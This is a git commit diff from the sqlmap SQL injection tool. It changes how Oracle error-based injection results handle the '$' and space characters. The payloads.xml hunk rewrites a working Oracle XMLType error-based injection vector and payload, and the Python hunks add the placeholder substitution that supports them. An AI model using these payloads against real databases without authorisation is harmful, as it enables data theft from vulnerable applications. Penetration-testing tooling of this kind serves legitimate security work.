Oracle XML based error payload has problems with char $ as with space

2024-11-25 11:03:47 +03:00 · 2011-03-21 13:13:12 +00:00 · 2011-03-21 13:13:12 +00:00 · b5c9ccb755
commit b5c9ccb755
parent 1abcd507b8
5 changed files with 19 additions and 6 deletions
--- a/lib/controller/checks.py
+++ b/lib/controller/checks.py
@ -344,7 +344,7 @@ def checkSqlInjection(place, parameter, value):
                                    threadData.lastRequestUID else None, re.DOTALL | re.IGNORECASE)

                            if output:
-                                result = output.replace(kb.misc.space, " ") == "1"
+                                result = output == "1"

                                if result:
                                    infoMsg = "%s parameter '%s' is '%s' injectable " % (place, parameter, title)
--- a/lib/core/agent.py
+++ b/lib/core/agent.py
@ -216,6 +216,7 @@ class Agent:
        payload = payload.replace("[DELIMITER_START]", kb.misc.start)
        payload = payload.replace("[DELIMITER_STOP]", kb.misc.stop)
        payload = payload.replace("[SPACE_REPLACE]", kb.misc.space)
+        payload = payload.replace("[DOLLAR_REPLACE]", kb.misc.dollar)
        payload = payload.replace("[SLEEPTIME]", str(conf.timeSec))

        if origValue is not None:
--- a/lib/core/option.py
+++ b/lib/core/option.py
@ -1256,6 +1256,7 @@ def __setKnowledgeBaseAttributes(flushAll=True):
    kb.misc.start      = ":%s:" % randomStr(length=3, lowercase=True)
    kb.misc.stop       = ":%s:" % randomStr(length=3, lowercase=True)
    kb.misc.space      = ":%s:" % randomStr(length=1, lowercase=True)
+    kb.misc.dollar     = ":%s:" % randomStr(length=1, lowercase=True)
    kb.misc.forcedDbms = None

    if flushAll:
--- a/lib/techniques/error/use.py
+++ b/lib/techniques/error/use.py
@ -94,6 +94,8 @@ def __oneShotErrorUse(expression, field):
            retVal = output
            break

+    retVal = __errorReplaceChars(retVal)
+
    dataToSessionFile("[%s][%s][%s][%s][%s]\n" % (conf.url, kb.injection.place, conf.parameters[kb.injection.place], expression, replaceNewlineTabs(retVal)))

    return retVal
@ -134,13 +136,22 @@ def __errorFields(expression, expressionFields, expressionFieldsList, expected=N
        if isinstance(num, int):
            expression = origExpr

-        if output:
-            output = output.replace(kb.misc.space, " ")
-
        outputs.append(output)

    return outputs

+def __errorReplaceChars(value):
+    """
+    Restores safely replaced characters
+    """
+
+    retVal = value
+
+    if value:
+        retVal = retVal.replace(kb.misc.space, " ").replace(kb.misc.dollar, "$")
+
+    return retVal
+
 def errorUse(expression, expected=None, resumeValue=True, dump=False):
    """
    Retrieve the output of a SQL query taking advantage of the error-based
--- a/xml/payloads.xml
+++ b/xml/payloads.xml
@ -1055,9 +1055,9 @@ Formats:
        <risk>0</risk>
        <clause>1</clause>
        <where>1</where>
-        <vector>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
+        <vector>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
        <request>
-            <payload>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),' ','[SPACE_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
+            <payload>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
        </request>
        <response>
            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>